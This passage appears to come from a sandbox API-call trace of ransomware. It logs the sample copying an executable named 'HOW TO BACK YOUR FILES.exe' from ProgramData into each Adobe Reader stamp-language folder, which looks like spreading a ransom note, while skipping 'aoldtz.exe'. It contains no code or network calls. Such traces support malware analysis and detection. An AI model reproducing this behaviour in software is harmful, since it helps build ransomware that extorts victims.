(normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\suo\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.041] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.041] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f804400, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54b10640, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54b10640, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0059.042] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.042] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.042] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV" [0059.042] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d7a48 | out: hHeap=0x2b0000) returned 1 [0059.042] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2660 | out: hHeap=0x2b0000) returned 1 [0059.042] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV") returned 79 [0059.042] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV" [0059.042] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.042] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\slv\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.072] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.072] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8064c800, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54b5c900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54b5c900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0059.072] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.072] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.072] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY" [0059.072] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d79a0 | out: hHeap=0x2b0000) returned 1 [0059.072] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2640 | out: hHeap=0x2b0000) returned 1 [0059.072] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY") returned 79 [0059.072] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY" [0059.072] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.072] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.083] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.083] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8064c800, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54b82a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54b82a60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.083] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.084] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.084] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS" [0059.084] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d78f8 | out: hHeap=0x2b0000) returned 1 [0059.084] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2620 | out: hHeap=0x2b0000) returned 1 [0059.084] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS") returned 79 [0059.084] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS" [0059.084] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.084] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rus\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.091] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.091] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80672960, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54b82a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54b82a60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.091] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.091] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.091] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM" [0059.091] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d7850 | out: hHeap=0x2b0000) returned 1 [0059.091] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2600 | out: hHeap=0x2b0000) returned 1 [0059.091] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM") returned 79 [0059.091] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM" [0059.091] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.091] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rum\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.097] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.097] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80698ac0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54ba8bc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54ba8bc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.098] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.098] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.098] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB" [0059.098] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d77a8 | out: hHeap=0x2b0000) returned 1 [0059.098] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d25e0 | out: hHeap=0x2b0000) returned 1 [0059.098] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB") returned 79 [0059.098] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB" [0059.098] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.098] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ptb\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.105] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.105] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ff748c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54ba8bc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54ba8bc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.105] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.105] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.106] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL" [0059.106] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d7700 | out: hHeap=0x2b0000) returned 1 [0059.106] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d25c0 | out: hHeap=0x2b0000) returned 1 [0059.106] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL") returned 79 [0059.106] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL" [0059.106] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.106] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\pol\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.112] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.112] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x806bec20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54bced20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54bced20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.112] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.113] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.113] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NOR", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NOR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NOR" [0059.113] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbb30 | out: hHeap=0x2b0000) returned 1 [0059.113] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d25a0 | out: hHeap=0x2b0000) returned 1 [0059.113] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NOR") returned 79 [0059.113] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NOR" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NOR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NOR" [0059.113] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.113] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NOR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\nor\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.119] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.119] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NOR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ff28600, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54bced20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54bced20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.119] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.119] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.119] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NLD", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NLD") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NLD" [0059.119] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cba88 | out: hHeap=0x2b0000) returned 1 [0059.119] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2580 | out: hHeap=0x2b0000) returned 1 [0059.119] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NLD") returned 79 [0059.120] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NLD" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NLD") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NLD" [0059.120] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.120] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NLD\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\nld\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.126] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.126] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NLD\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7feb61e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54bf4e80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54bf4e80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.126] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.126] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.126] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR" [0059.126] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb9e0 | out: hHeap=0x2b0000) returned 1 [0059.126] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2560 | out: hHeap=0x2b0000) returned 1 [0059.126] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR") returned 79 [0059.126] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR" [0059.127] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.127] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\kor\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.133] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.133] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ff024a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54bf4e80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54bf4e80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.133] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.133] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.134] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\JPN", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\JPN") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\JPN" [0059.134] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb938 | out: hHeap=0x2b0000) returned 1 [0059.134] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2540 | out: hHeap=0x2b0000) returned 1 [0059.134] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\JPN") returned 79 [0059.134] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\JPN" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\JPN") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\JPN" [0059.134] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.134] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\JPN\\HOW TO BACK YOUR 